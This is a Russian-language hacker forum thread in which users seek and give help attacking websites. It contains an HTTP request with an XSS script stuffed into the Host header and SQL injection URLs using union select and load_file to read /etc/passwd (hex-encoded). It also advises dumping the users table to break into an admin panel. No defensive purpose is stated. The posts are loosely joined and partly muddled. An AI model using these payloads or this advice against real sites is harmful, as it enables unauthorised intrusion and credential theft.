GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

ты отправляешь в никуда

__________________

Он отправляет на сайт SITE<xscript>alert('XSS');</xscript>.ru и запрашивает index.html =\

Помогите чем можете.
Есть сайт, на нем скуль инъекция.
site.ru/news.php?id=-1+union+select+1,2,333,444,5,6,7,8,9,10/*

выводятся столбцы 3 и 4

делаю так site.ru/news.php?id=-1+union+select+1,2,load_file('some_file'),444,5,6, 7,8,9,10/* - вылетает ошибка
делаю site.ru/news.php?id=-1+union+select+1,2,load_file(char(тут числа)),444,5,6,7,8,9,10/* - пустота, т.е. никаких ошибок не вылетает, просто вместо столбца 3 пустота ( в чем гемор ??
доступа к information_schema нет
на сайте нет форумов, нашел админку site.ru/admin/ , там доступ закрыт через .htacces

что посоветуете господа ?

это нормально, у пользователя mysql нет прав на чтение файлов. А ошибку выкидывает потомы что фильтруется кавычка.
что делать - подбирать таблицу с пользователями и надеятся что пароли подойдут к админке, а лучше ссылку на сайт

ну это совсем не факт смотря каие там "тут числа", мож файла такого просто не существует, timlame, попробуй:
site.ru/news.php?id=-1+union+select+1,2,load_file(0x2F6574632F706173737 764),444,5,6,7,8,9,10/*

если не увидишь ничего, то или ось винда или файловых привилегий нет скорее второе

__________________
Карфаген должен быть разрушен...

т.е. в случае отсутствия файла load_file() возвращает пустую строчку ?

и в случае отсутствия файла и в случае если нет файловых привилегий
ошибка возникает тогда, когда ты в load_file() (при наличии file_priv) передал только имя не существующей директории

__________________
Карфаген должен быть разрушен...

вместо сайт пусь буит www.debilko.ru

знач,как я понял,должно быть так:

GET /index.html HTTP/1.1
Host: debilko<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

йа пробывал и гет и пост. Вообще скажите, код то можно внедрить ?)

GET /index.html HTTP/1.1
Host: debilko.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive


так должно быть. А ты вообще что хочешь сделать? Почитай про синтаксис http 1.0. Думаю, поймешь, че за чушь написал.